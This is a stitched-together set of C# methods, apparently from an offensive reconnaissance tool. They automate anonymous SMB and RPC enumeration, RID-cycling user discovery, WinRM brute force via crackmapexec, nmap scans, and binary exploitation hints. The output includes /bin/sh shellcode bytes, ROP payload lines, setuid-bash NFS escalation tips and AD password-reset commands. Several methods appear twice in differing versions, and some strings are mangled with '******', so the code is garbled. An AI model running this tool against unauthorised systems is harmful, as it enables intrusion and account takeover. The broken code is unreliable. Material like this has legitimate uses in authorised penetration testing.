private static string TestAnonymousAccess_Linux(string target)
{
if (General.IsInstalledOnLinux("smbclient", "/usr/bin/smbclient"))
{
string smbClientItems = "";
List <string> processResults = General.GetProcessOutput("smbclient", $" -L {target} --no-pass -g"); // null auth
if (processResults.Count == 1 && processResults[0].Contains("NT_STATUS_ACCESS_DENIED"))
{
return("- No Anonymous Access");
}
else if (processResults.Count == 1 && processResults[0].Contains("NT_STATUS_CONNECTION_DISCONNECTED"))
{
return("- It connected, but instantly disconnected you");
}
else if (processResults.Count == 2 && processResults[0] == "Anonymous login successful" && processResults[1] == "SMB1 disabled -- no workgroup available")
{
return("- Anonymous Access Allowed - But No Shares Found");
}
else if (processResults.Count >= 1 && processResults[0].Contains("NT_STATUS_IO_TIMEOUT"))
{
return("- Timed out :(");
}
foreach (string item in processResults)
{
// type|name|comment
if (item.Trim() != "SMB1 disabled -- no workgroup available" && item.Trim() != "Anonymous login successful")
{
try
{
string itemType = item.Split('|')[0];
string itemName = item.Split('|')[1];
string itemComment = item.Split('|')[2];
smbClientItems += "- " + itemType + ": " + itemName + " " + (itemComment == "" ? "" : "(" + itemComment.Trim() + ")") + Environment.NewLine;
List <string> subProcessResults = General.GetProcessOutput("smbclient", $"//{target}/{itemName} --no-pass -c \"ls\"");
if (subProcessResults.Count > 1 && !subProcessResults.Any(x => x.Contains("NT_STATUS_ACCESS_DENIED") || x.Contains("NT_STATUS_OBJECT_NAME_NOT_FOUND")))
{
smbClientItems += "-- " + $"{itemName} has ls perms - {subProcessResults.Count} items found! -> smbclient //{target}/{itemName} --no-pass".Pastel(Color.Orange) + Environment.NewLine;
}
}
catch (Exception ex)
{
if (ex.Message.Contains("NT_STATUS_IO_TIMEOUT"))
{
smbClientItems = "-- Timeout - Try later :(" + Environment.NewLine;
}
else
{
Console.WriteLine($"TestAnonymousAccess_Linux - Error: {ex.Message} - Invalid item: {item} - Bug Reelix!");
}
}
}
}
return(smbClientItems.Trim(Environment.NewLine.ToCharArray()));
}
else
{
return("- Error: Cannot find /usr/bin/smbclient - Please install it".Pastel(Color.Red));
}
}
private static void WinRMBrute_Linux(string ip, string userFile, string passFile)
{
if (General.IsInstalledOnLinux("crackmapexec", ""))
{
Console.WriteLine("Starting - Please wait...");
General.RunProcessWithOutput("crackmapexec", "winrm " + ip + " -u " + userFile + " -p " + passFile);
}
else
{
Console.WriteLine("This requires crackmapexec -> https://github.com/byt3bl33d3r/CrackMapExec/releases");
}
}
public static string GetInfo(string ip)
{
string toReturn = "";
if (General.GetOS() == General.OS.Linux)
{
if (General.IsInstalledOnLinux("svn"))
{
// svn info svn://ip - Anything super useful?
string processOutput = string.Join("|", General.GetProcessOutput("svn", "log svn://" + ip));
List <string> commitList = processOutput.Split(new[] { "------------------------------------------------------------------------" }, StringSplitOptions.None).ToList();
commitList.RemoveAll(string.IsNullOrEmpty);
foreach (string commit in commitList)
{
List <string> splitItems = commit.Split('|').ToList();
splitItems.RemoveAll(string.IsNullOrEmpty);
// 0 - Revision
// 1 - Name
// 2 - Date
// 3 - Lines (?)
// 4 - Comment
try
{
string commitRevision = splitItems[0].Trim();
int commitDiff = int.Parse(commitRevision.Replace("r", "")) - 1; // Indexes - How do they work!
string commitName = splitItems[1].Trim();
string commitDate = splitItems[2];
string commitLines = splitItems[3];
string commitComments = splitItems[4];
string commitInfo = "- Commit " + commitRevision + " by " + commitName + " - " + commitComments + " ( svn diff -r" + commitDiff + " svn://" + ip + " )";
toReturn += commitInfo + Environment.NewLine;
}
catch (Exception ex)
{
toReturn += "- Conversion Error: " + ex.Message + Environment.NewLine;
}
}
toReturn = toReturn.Trim(Environment.NewLine.ToCharArray());
}
else
{
Console.WriteLine("svn is not installed - Skipping enumeration (You probably want to 'svn install subversion')");
}
}
else
{
Console.WriteLine("svn.GetInfo currently lacks Windows support. Bug Reelix.");
}
return(toReturn);
}
public static string DefaultScan(string[] args, bool mustPing)
{
// ip[0]
// outputfile[1]
if (args.Length < 1)
{
Console.WriteLine("Usage: ip outfile");
Environment.Exit(0);
}
string target = "";
string fileName = "";
if (args.Length == 1)
{
target = args[0];
Console.WriteLine("Outfile name (1 word, no extension)");
fileName = Console.ReadLine();
}
else if (args.Length == 2)
{
target = args[0];
fileName = args[1];
}
// Check if nmap is installed
if (!General.IsInstalledOnLinux("nmap"))
{
Console.WriteLine("Error - nmap is not installed");
Environment.Exit(0);
}
DateTime beforeNmapDate = DateTime.Now;
Console.WriteLine($"Doing an optimized Nmap scan on {target} - This may take awhile...");
string noPing = mustPing ? "" : " -Pn ";
if (General.GetOS() == General.OS.Linux)
{
General.RunProcess($"sudo", $"nmap -sS -p- {noPing} --min-rate=5000 {target} -oG {fileName}.nmap");
}
else
{
General.RunProcess($"nmap", $"-sS -p- {noPing} --min-rate=5000 {target} -oG {fileName}.nmap");
}
DateTime afterNmapDate = DateTime.Now;
TimeSpan nmapScanDuration = afterNmapDate - beforeNmapDate;
Console.WriteLine("Scan complete in " + string.Format("{0:0.00}s", nmapScanDuration.TotalSeconds) + $" - {fileName}.nmap for reecon");
return(fileName);
}
public static string GetInfo(string target, int port)
{
string toReturn = "";
if (!General.IsInstalledOnLinux("rpcinfo"))
{
toReturn = "- " + "Error: Cannot find rpcinfo - Unable to enumerate - install rpcbind".Pastel(Color.Red);
}
else
{
List <string> processOutput = General.GetProcessOutput("rpcinfo", "-p " + target);
foreach (string item in processOutput)
{
toReturn += "- " + item + Environment.NewLine;
}
}
return(toReturn.Trim(Environment.NewLine.ToCharArray()));
}
private static string TestAnonymousAccess_Linux(string target)
{
if (General.IsInstalledOnLinux("smbclient", "/usr/bin/smbclient"))
{
string smbClientItems = "";
List <string> processResults = General.GetProcessOutput("smbclient", $" -L {target} --no-pass -g"); // null auth
if (processResults.Count == 1 && processResults[0].Contains("NT_STATUS_ACCESS_DENIED"))
{
return("- No Anonymous Access");
}
else if (processResults.Count == 1 && processResults[0].Contains("NT_STATUS_CONNECTION_DISCONNECTED"))
{
return("- It connected, but instantly disconnected you");
}
else if (processResults.Count == 2 && processResults[0] == "Anonymous login successful" && processResults[1] == "SMB1 disabled -- no workgroup available")
{
return("- Anonymous Access Allowed - But No Shares Found");
}
foreach (string item in processResults)
{
// type|name|comment
if (!item.StartsWith("SMB1 disabled"))
{
string itemType = item.Split('|')[0];
string itemName = item.Split('|')[1];
string itemComment = item.Split('|')[2];
smbClientItems += "- " + itemType + ": " + itemName + " " + (itemComment == "" ? "" : "(" + itemComment.Trim() + ")") + Environment.NewLine;
List <string> subProcessResults = General.GetProcessOutput("smbclient", $"//{target}/{itemName} --no-pass -c \"ls\"");
if (subProcessResults.Count > 1)
{
smbClientItems += "-- " + $"{itemName} has ls perms! -> smbclient //{target}/{itemName} --no-pass".Pastel(Color.Orange) + Environment.NewLine;
}
}
}
return(smbClientItems.Trim(Environment.NewLine.ToCharArray()));
}
else
{
return("- Error: Cannot find /usr/bin/smbclient - Please install it".Pastel(Color.Red));
}
}
private static string GetRPCInfo(string ip)
{
// Beware!
string rpcInfo = "";
bool anonAccess = false;
bool signing = true;
if (General.GetOS() == General.OS.Linux)
{
if (General.IsInstalledOnLinux("rpcclient", "/usr/bin/rpcclient"))
{
// Find the Domain Name
// Console.WriteLine("RPC - lsaquery");
List <string> domainNameList = rpcclient.GetLsaqueryOutput(ip);
domainNameList.RemoveAll(x => !x.StartsWith("Domain Name:"));
if (domainNameList.Count == 1)
{
anonAccess = true;
rpcInfo += "- " + domainNameList[0] + Environment.NewLine;
}
// Server info
// Console.WriteLine("RPC - srvinfo");
List <string> srvinfoList = rpcclient.GetSrvinfoOutput(ip);
bool setNoSigning = false;
// If it's denied the first time - Try the no-signing backup
if (srvinfoList.Count != 0 && srvinfoList[0].Contains("NT_STATUS_ACCESS_DENIED"))
{
// noSigning backup!
// Console.WriteLine("RPC - srvinfo - noSigning Backup");
srvinfoList = rpcclient.GetSrvinfoOutput(ip, false);
setNoSigning = true;
}
if (srvinfoList.Count != 0 && !srvinfoList[0].Contains("NT_STATUS_ACCESS_DENIED") && !srvinfoList[0].Contains("NT_STATUS_LOGON_FAILURE"))
{
// If it only worked with the no-signing backup - Yay!
if (setNoSigning)
{
Console.WriteLine("Sneaky access found with RPC - This might take a bit longer than planned (Up to 3 minutes)");
signing = false;
}
anonAccess = true;
/*
* MOTUNUI Wk Sv PrQ Unx NT SNT motunui server (Samba, Ubuntu)
* platform_id : 500
* os version : 6.1
* server type : 0x809a03
*/
rpcInfo += "- srvinfo: " + srvinfoList[0] + Environment.NewLine;
// https://en.wikipedia.org/wiki/List_of_Microsoft_Windows_versions
if (srvinfoList.Count == 4)
{
if (srvinfoList[2].Trim().StartsWith("os version"))
{
string osVersion = srvinfoList[2];
osVersion = osVersion.Split(':')[1];
osVersion = osVersion.Trim();
if (osVersion == "6.1")
{
rpcInfo += "- srvinfo (OS): Windows 7 OR Windows Server 2008 (One of the two)" + Environment.NewLine;
}
else if (osVersion == "6.2")
{
rpcInfo += "- srvinfo (OS): Windows 8 OR Windows Server 2012 (One of the two)" + Environment.NewLine;
}
else if (osVersion == "10.0")
{
rpcInfo += "- srvinfo (OS): Windows 10 OR Windows Server 2016 OR Windows Server 2019 (10.0 is very vague)" + Environment.NewLine;
}
else
{
rpcInfo += "- srvinfo (OS): Unknown - ID: " + osVersion + " - Bug Reelix!" + Environment.NewLine;
}
}
else
{
rpcInfo += "- Weird srvinfo return - Bug Reelix!";
}
}
}
// Console.WriteLine("RPC - enumdomusers");
List <string> enumdomusersList = rpcclient.GetEnumdomusersOutput(ip, signing);
if (enumdomusersList.Count == 0 || // Allowed - But no results
enumdomusersList.Count == 1 && enumdomusersList[0].Contains("NT_STATUS_ACCESS_DENIED"))
{
// Find public SIDs with lsaenumsid
// Console.WriteLine("RPC - lsaenumid");
List <string> sidList = rpcclient.GetLsaenumsidOutput(ip, signing);
if (sidList.Count != 0 && !sidList[0].Contains("NT_STATUS_ACCESS_DENIED"))
{
anonAccess = true;
rpcInfo += "- Found SIDs" + Environment.NewLine;
List <string> sidResolution = rpcclient.GetLookupsidsOutput(ip, sidList, signing);
if (sidResolution.Count != 0)
{
foreach (string result in sidResolution)
{
rpcInfo += "-- " + result + Environment.NewLine;
}
}
}
// Find sneaky SIDs
// Console.WriteLine("RPC - lookupnames");
List <string> sneakyNameLookup = rpcclient.GetLookupnamesOutput(ip, "administrator guest krbtgt root bin none", signing);
sneakyNameLookup.RemoveAll(x => !x.Contains("(User: "******"-") + 1);
if (!sneakySIDBaseList.Contains(sneakySIDBase))
{
sneakySIDBaseList.Add(sneakySIDBase);
}
}
}
// Needs the base SID to enumerate
if (sneakySIDBaseList.Count != 0)
{
List <string> sneakySIDList = new();
foreach (string sneakyBase in sneakySIDBaseList)
{
// Low ones are just system names - Can ignore them - Proper ones start from 1000
for (int j = 1000; j <= 1015; j++)
{
sneakySIDList.Add(sneakyBase + j);
}
// Some sneakier ones hiding from 1100 instead
for (int j = 1100; j <= 1115; j++)
{
sneakySIDList.Add(sneakyBase + j);
}
List <string> sneakySIDLookup = rpcclient.GetLookupsidsOutput(ip, sneakySIDList, signing);
if (sneakySIDLookup.Count != 0)
{
// Remove non-users
sneakySIDLookup.RemoveAll(x => !x.Trim().EndsWith("(1)"));
foreach (string lookupResult in sneakySIDLookup)
{
string name = lookupResult.Substring(0, lookupResult.LastIndexOf(" (1)"));
name = name.Remove(0, name.LastIndexOf("\\") + 1);
// Some invalid ones simply have the number itself instead of the name
// A bit hacky, but it works
if (!int.TryParse(name, out int toIgnore))
{
rpcInfo += "-- " + $"Sneaky Username Found: {name}".Pastel(Color.Orange) + Environment.NewLine;
}
}
}
}
}
}
}
else // Count > 0
{
string firstItem = enumdomusersList[0];
if (firstItem.Contains("user:"******"rid:"))
{
// All is fine
if (enumdomusersList.Count >= 3)
{
Console.WriteLine("Found a lot of useful RPC info - Output may take a few seconds longer than expected");
}
rpcInfo += "- User Listing" + Environment.NewLine;
List <string> usernames = new List <string>();
foreach (string user in enumdomusersList)
{
// user:[fox] rid:[0x3e8]
string username = user.Remove(0, user.IndexOf("[") + 1);
username = username.Substring(0, username.IndexOf("]"));
usernames.Add(username);
rpcInfo += rpcclient.GetQueryuserInfo(ip, username);
}
// See if there are any we're missing
// Get the default names list
var defaultNames = rpcclient.LookupNames(ip, "administrator guest krbtgt root bin none", signing);
// Filter them to only get the users
defaultNames = defaultNames.Where(x => x.Type.Contains("User")).ToList();
// Get the users SIDs
List <string> defaultNameSids = defaultNames.Select(x => x.SID).ToList();
// Sneaky sid lookup by the sids
var sneakySids = rpcclient.GetSneakySids(ip, defaultNameSids, signing);
// Remove the names we already have
sneakySids.RemoveAll(x => usernames.Contains(x.Name));
// Rest are missed!
foreach (var item in sneakySids)
{
rpcInfo += "-- " + $"Sneaky Username Found: {item.Name}".Pastel(Color.Orange) + Environment.NewLine;
}
// 23 -> https://room362.com/post/2017/reset-ad-user-password-with-linux/
rpcInfo += "--> rpcclient -> setuserinfo2 userNameHere 23 'newPasswordHere'" + Environment.NewLine;
}
else if (firstItem == "Cannot connect to server. Error was NT_STATUS_RESOURCE_NAME_NOT_FOUND")
{
rpcInfo = "- Cannot connect - Are you sure it's up?" + Environment.NewLine;
}
else if (firstItem == "Cannot connect to server. Error was NT_STATUS_IO_TIMEOUT")
{
rpcInfo = "- Cannot connect - It timed out :<" + Environment.NewLine;
}
else if (firstItem == "Cannot connect to server. Error was NT_STATUS_CONNECTION_DISCONNECTED")
{
rpcInfo = "- Cannot connect - It kicks you out instantly" + Environment.NewLine;
}
else if (firstItem.Contains("was NT_STATUS_ACCESS_DENIED"))
{
rpcInfo = "- enumdomusers is denied - Probably can't get anything useful" + Environment.NewLine;
}
else if (firstItem.Contains("was NT_STATUS_LOGON_FAILURE"))
{
rpcInfo = "- Unable to log on at all - Possibly a timeout :(" + Environment.NewLine;
}
else
{
foreach (string item in enumdomusersList)
{
Console.WriteLine("Debug Info item: " + item);
}
rpcInfo = "- Unknown items in NETBIOS.GetRPCInfo - Bug Reelix (Check Debug Info Item output)" + Environment.NewLine;
}
}
if (anonAccess == true)
{
rpcInfo += "- " + $"Anonymous access permitted! -> rpcclient -U \"\"%\"\" {ip}".Pastel(Color.Orange) + Environment.NewLine;
}
else
{
rpcInfo += "- No anonymous RPC access" + Environment.NewLine;
// 23 -> https://room362.com/post/2017/reset-ad-user-password-with-linux/
rpcInfo += "-- If you get access -> enumdomusers / queryuser usernameHere / setuserinfo2 userNameHere 23 'newPasswordHere'" + Environment.NewLine;
}
}
else
{
rpcInfo = "- Error: Cannot find /usr/bin/rpcclient - Please install smbclient (Includes it)".Pastel(Color.Red) + Environment.NewLine;
}
}
else
{
rpcInfo = "- No RPC Info - Try run on Linux (rpcclient)" + Environment.NewLine;
}
return(rpcInfo);
}
private static void ScanFile(string fileName)
{
if (!fileName.StartsWith("./"))
{
Console.WriteLine("fileName must start with ./");
return;
}
Architecture architecture = IDElf(fileName);
if (architecture == Architecture.x86)
{
Console.WriteLine("Architecture: x86");
// You can get a segfault address of x86 programs by going
// dmesg | tail -2 (Sometimes the last entry isn't for it)
// dmesg | grep "ret2win32" | tail -1
// pwn cyclic 500
// aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae
General.RunProcess("/bin/bash", " -c \"echo 'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae' | " + fileName + "\"", 5);
List <string> dmesgOutput = General.GetProcessOutput("dmesg", "");
foreach (string item in dmesgOutput)
{
// segfault at 6161616c ip 000000006161616c x
if (item.Contains(fileName.TrimStart("./".ToCharArray())) && item.Contains("segfault at "))
{
Console.WriteLine("- Cyclic Segfault: " + item.Remove(0, item.IndexOf("segfault at ") + 12).Substring(0, 9));
}
}
}
else if (architecture == Architecture.x64)
{
Console.WriteLine("Architecture: x64");
// TODO: Find where it segfaults, -1
}
else
{
Console.WriteLine("Architecture: Unknown - Can only deal with ELFs");
}
if (General.IsInstalledOnLinux("ropper"))
{
List <string> ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --search \"ret;\"");
foreach (string item in ropperOutput)
{
if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]"))
{
string pwnItem = item.Trim();
pwnItem = pwnItem.Replace(": ret;", "");
if (pwnItem.Length == 18) // x64
{
pwnItem += " -- payload += p64(0x" + pwnItem.Substring(pwnItem.Length - 6, 6) + ")";
// 0x16 - x64 address
}
else
{
Console.WriteLine("Not 18 - " + pwnItem.Length);
}
Console.WriteLine("- ret; (Only function calls) --> " + pwnItem);
}
}
ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --search \"pop rdi; ret;\"");
foreach (string item in ropperOutput)
{
if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]"))
{
string pwnItem = item.Trim();;
pwnItem = pwnItem.Replace(": pop rdi; ret;", "");
if (pwnItem.Length == 18)
{
pwnItem += " -- payload += p64(0x" + pwnItem.Substring(pwnItem.Length - 6, 6) + ")";
// 0x16 - x64 address
}
else
{
Console.WriteLine("Not 18 - " + pwnItem.Length);
}
Console.WriteLine("- pop rdi; ret; (Can set values) --> " + pwnItem);
}
}
ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --string \"/bin/sh\"");
foreach (string item in ropperOutput)
{
if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]") && item.Contains("/bin/sh"))
{
string pwnItem = item.Trim();
pwnItem = pwnItem.Replace("/bin/sh", "").Trim();;
if (pwnItem.Length == 10)
{
pwnItem += " -- payload += p64(0x" + pwnItem.Substring(pwnItem.Length - 6, 6) + ")";
// 0x16 - x64 address
}
else
{
Console.WriteLine("Not 10 - " + pwnItem.Length);
}
Console.WriteLine("- /bin/sh --> " + pwnItem);
}
}
// // ropper --file sudo_pwn_file_here --string "/bin/sh"
}
else
{
Console.WriteLine("- ropper is not installed - Skipping gadget check and string search");
}
if (General.IsInstalledOnLinux("rabin2"))
{
List <string> rabin2Output = General.GetProcessOutput("rabin2", "-I ./" + fileName);
foreach (string item in rabin2Output)
{
if (item.Trim().StartsWith("nx") && item.Contains("false"))
{
Console.WriteLine("- nx is disabled - You can run your own shellcode!");
if (architecture == Architecture.x64)
{
Console.WriteLine(@"Linux/x86-64 - Execute /bin/sh: \x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05");
}
else
{
// http://shell-storm.org/shellcode/
Console.WriteLine("Bug Reelix to fix his code!");
}
}
else if (item.Trim().StartsWith("nx") && item.Contains("true"))
{
Console.WriteLine("- nx is enabled - No custom shellcode for you!");
}
}
}
else
{
Console.WriteLine("- rabin2 is not installed - Skipping nx check");
}
if (General.IsInstalledOnLinux("objdump"))
{
List <string> objdumpOutput = General.GetProcessOutput("objdump", $"-D {fileName}");
foreach (string item in objdumpOutput)
{
if (item.Contains("call") && item.Contains("system")) // callq contains call
{
Console.WriteLine("- system --> " + item);
}
if (item.Trim().EndsWith(" <puts@plt>:"))
{
Console.WriteLine("- puts@plt (plt_puts) --> " + item);
}
if (item.Contains("puts@GLIBC"))
{
Console.WriteLine("- puts@GLIBC (got_puts) --> " + item);
}
}
objdumpOutput = General.GetProcessOutput("objdump", $"-t {fileName}");
foreach (string item in objdumpOutput)
{
// .text = Name
// " g" = Global
if (item.Contains(".text") && item.Contains(" g "))
{
Console.WriteLine("- Useful Symbol: " + item);
}
}
// objdump -t ./file.elf | grep .text
}
else
{
Console.WriteLine("- objdump is not installed - Skipping syscalls");
}
Console.WriteLine("Finished");
}
public static string GetInfo(string target, int port)
{
// TODO: https://svn.nmap.org/nmap/scripts/nfs-ls.nse
string fileList = "";
if (General.GetOS() == General.OS.Windows)
{
if (File.Exists(@"C:\Windows\System32\showmount.exe"))
{
List <string> outputLines = General.GetProcessOutput(@"C:\Windows\System32\showmount.exe", "-e " + target);
if (outputLines.Count > 1)
{
outputLines.RemoveAt(0);
fileList = "- Files:" + Environment.NewLine;
foreach (string line in outputLines)
{
fileList += "-- " + line + Environment.NewLine;
}
fileList = fileList.Trim(Environment.NewLine.ToCharArray());
fileList += Environment.NewLine + $"- To Mount --> mount \\\\{target}\\shareNameHere x:";
}
fileList = fileList.Trim(Environment.NewLine.ToCharArray());
return(fileList);
}
else
{
fileList = "- showmount does not exist - Bug Reelix to update this section for more compatibility";
return(fileList);
}
}
else if (General.GetOS() == General.OS.Linux)
{
if (General.IsInstalledOnLinux("showmount")) // "/sbin/showmount" OR "/usr/sbin/showmount"
{
List <string> showmountOutput = General.GetProcessOutput("showmount", "-e " + target);
foreach (string line in showmountOutput)
{
// https://github.com/TheRealPoloMints/Blog/blob/master/Security%20Challenge%20Walkthroughs/Networks%202/bash
// NFS V1
if (line.Trim().EndsWith("*"))
{
fileList += "- " + line.Pastel(Color.Orange) + Environment.NewLine;
fileList += "-- NFSV1 -> " + "sudo mount -t nfs {target}:/mountNameHere /tmp/mount/ -nolock".Pastel(Color.Orange) + Environment.NewLine;
fileList += "--- " + "Try copy over a version of bash onto the share, +s +x it, then ./bash -p".Pastel(Color.Orange) + Environment.NewLine;
}
// NFS V2
else if (line.Contains(" (everyone)"))
{
fileList += "- " + line.Pastel(Color.Orange) + Environment.NewLine;
fileList += "-- NFSV2 -> " + $"sudo mount -t nfs -o vers=2 {target}:/mountNameHere /mnt".Pastel(Color.Orange) + Environment.NewLine;
fileList += "--- " + "Try copy over a version of bash onto the share, +s +x it, then ./bash -p".Pastel(Color.Orange) + Environment.NewLine;
}
else
{
fileList += "- " + line + Environment.NewLine;
}
}
return(fileList.Trim(Environment.NewLine.ToCharArray()));
//
// Windows
//
// ManagementClass objMC = new ManagementClass("Win32_ServerFeature"); // Only in Windows Server 2008 / R2
/*
* ManagementClass objMC = new ManagementClass("Win32_OptionalFeature");
* ManagementObjectCollection objMOC = objMC.GetInstances();
* foreach (ManagementObject objMO in objMOC)
* {
* //Console.WriteLine("Woof!");
* string featureName = (string)objMO.Properties["Name"].Value;
* if (!featureName.ToUpper().Contains("NFS"))
* {
* continue;
* }
* uint installState = 0;
* try
* {
* installState = (uint)objMO.Properties["InstallState"].Value; // 1 = Enabled, 2 = Disabled, 3 = Absent, 4 = Unknown
* }
* catch
* {
* Console.WriteLine("Error - InstallState is: " + (string)objMO.Properties["InstallState"].Value);
* }
*
* //add to my list
* Console.WriteLine("Installed: " + featureName + " -> " + installState);
* }
*/
}
else
{
return("- Error - showmount is not installed - Unable to enumerate! Run: sudo apt install nfs-common".Pastel(Color.Red));
}
}
else
{
Console.WriteLine("Error - OS Not Supportd - Bug Reelix");
}
return("");
}
private static string GetRPCInfo(string ip)
{
string rpcInfo = "";
bool anonAccess = false;
if (General.GetOS() == General.OS.Linux)
{
if (General.IsInstalledOnLinux("rpcclient", "/usr/bin/rpcclient"))
{
// Find the Domain Name
List <string> domainNameList = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"lsaquery\"");
domainNameList.RemoveAll(x => !x.StartsWith("Domain Name:"));
if (domainNameList.Count == 1)
{
anonAccess = true;
rpcInfo += "- " + domainNameList[0] + Environment.NewLine;
}
// Find basic users
List <string> enumdomusersList = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"enumdomusers\"");
if (enumdomusersList.Count == 0)
{
List <string> srvinfoList = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"srvinfo\"");
if (srvinfoList.Count != 0)
{
anonAccess = true;
rpcInfo += "- srvinfo: " + srvinfoList[0] + Environment.NewLine;
}
// Find public SIDs with lsaenumsid
List <string> sidList = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"lsaenumsid\"");
if (sidList.Count != 0)
{
anonAccess = true;
rpcInfo += "- Found SIDs" + Environment.NewLine;
// Remove the "found X SIDs" text
sidList.RemoveAll(x => x.StartsWith("found "));
// Remove blanks
sidList.RemoveAll(x => string.IsNullOrEmpty(x));
string sidListString = string.Join(' ', sidList);
// Enumerate the rest
List <string> sidResolution = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"lookupsids {sidListString}\"");
if (sidResolution.Count != 0)
{
foreach (string result in sidResolution)
{
rpcInfo += "-- " + result + Environment.NewLine;
}
}
}
// Find sneaky SIDs
List <string> sneakyNameLookup = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"lookupnames administrator guest krbtgt root bin none");
sneakyNameLookup.RemoveAll(x => !x.Contains("(User: "******"-") + 1);
if (!sneakySIDBaseList.Contains(sneakySIDBase))
{
sneakySIDBaseList.Add(sneakySIDBase);
}
}
}
if (sneakySIDBaseList.Count != 0)
{
List <string> sneakySIDList = new List <string>();
foreach (string sneakyBase in sneakySIDBaseList)
{
// Low ones are just system names - Can ignore them - Proper ones start from 1000
sneakySIDList.Add(sneakyBase + "1000");
sneakySIDList.Add(sneakyBase + "1001");
sneakySIDList.Add(sneakyBase + "1002");
sneakySIDList.Add(sneakyBase + "1003");
sneakySIDList.Add(sneakyBase + "1004");
sneakySIDList.Add(sneakyBase + "1005");
sneakySIDList.Add(sneakyBase + "1006");
sneakySIDList.Add(sneakyBase + "1007");
sneakySIDList.Add(sneakyBase + "1008");
sneakySIDList.Add(sneakyBase + "1009");
sneakySIDList.Add(sneakyBase + "1010");
List <string> sneakySIDLookup = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"lookupsids " + string.Join(" ", sneakySIDList) + "\"");
if (sneakySIDLookup.Count != 0)
{
foreach (string lookupResult in sneakySIDLookup)
{
string name = lookupResult.Substring(0, lookupResult.IndexOf(" (1)"));
name = name.Remove(0, name.LastIndexOf("\\") + 1);
// Invalid ones simply have the number itself instead of the name
// A bit hacky, but it works
if (!int.TryParse(name, out int toIgnore))
{
rpcInfo += "-- Sneaky Name Found: " + name + Environment.NewLine;
}
}
}
}
}
}
}
else // Count > 0
{
string firstItem = enumdomusersList[0];
if (firstItem.Contains("user:"******"rid:"))
{
// All is fine
if (enumdomusersList.Count >= 3)
{
Console.WriteLine("Found a lot of useful RPC info - Output may take a few seconds longer than expected");
}
rpcInfo = "- User Listing" + Environment.NewLine;
foreach (string user in enumdomusersList)
{
rpcInfo += QueryEnumDomUser(ip, user);
}
// 23 -> https://room362.com/post/2017/reset-ad-user-password-with-linux/
rpcInfo += "--> rpcclient -> setuserinfo2 userNameHere 23 'newPasswordHere'" + Environment.NewLine;
}
else if (firstItem == "Cannot connect to server. Error was NT_STATUS_RESOURCE_NAME_NOT_FOUND")
{
rpcInfo = "- Cannot connect - Are you sure it's up?" + Environment.NewLine;
}
else if (firstItem == "Cannot connect to server. Error was NT_STATUS_IO_TIMEOUT")
{
rpcInfo = "- Cannot connect - It timed out :<" + Environment.NewLine;
}
else if (firstItem == "Cannot connect to server. Error was NT_STATUS_CONNECTION_DISCONNECTED")
{
rpcInfo = "- Cannot connect - It kicks you out instantly" + Environment.NewLine;
}
else
{
foreach (string item in enumdomusersList)
{
Console.WriteLine("Debug Info item: " + item);
}
rpcInfo = "- Unknown items in NETBIOS.GetRPCInfo - Bug Reelix (Check Debug Info Item output)" + Environment.NewLine;
}
}
if (anonAccess == true)
{
rpcInfo += "- " + $"Anonymous access permitted! -> rpcclient -U \"\"%\"\" {ip}".Pastel(Color.Orange) + Environment.NewLine;
}
else
{
rpcInfo += "- No anonymous RPC access" + Environment.NewLine;
// 23 -> https://room362.com/post/2017/reset-ad-user-password-with-linux/
rpcInfo += "-- If you get access -> enumdomusers / queryuser usernameHere / setuserinfo2 userNameHere 23 'newPasswordHere'" + Environment.NewLine;
}
}
else
{
rpcInfo = "- Error: Cannot find /usr/bin/rpcclient - Please install smbclient (Includes it)".Pastel(Color.Red) + Environment.NewLine;
}
}
else
{
rpcInfo = "- No RPC Info - Try run on Linux (rpcclient)" + Environment.NewLine;
}
return(rpcInfo);
}
public static string GetInfo(string target, int port)
{
// TODO: https://svn.nmap.org/nmap/scripts/nfs-ls.nse
string fileList = "";
if (General.GetOS() == General.OS.Windows)
{
if (File.Exists(@"C:\Windows\System32\showmount.exe"))
{
List <string> outputLines = General.GetProcessOutput(@"C:\Windows\System32\showmount.exe", "-e " + target);
if (outputLines.Count > 1)
{
outputLines.RemoveAt(0);
fileList = "- Files:" + Environment.NewLine;
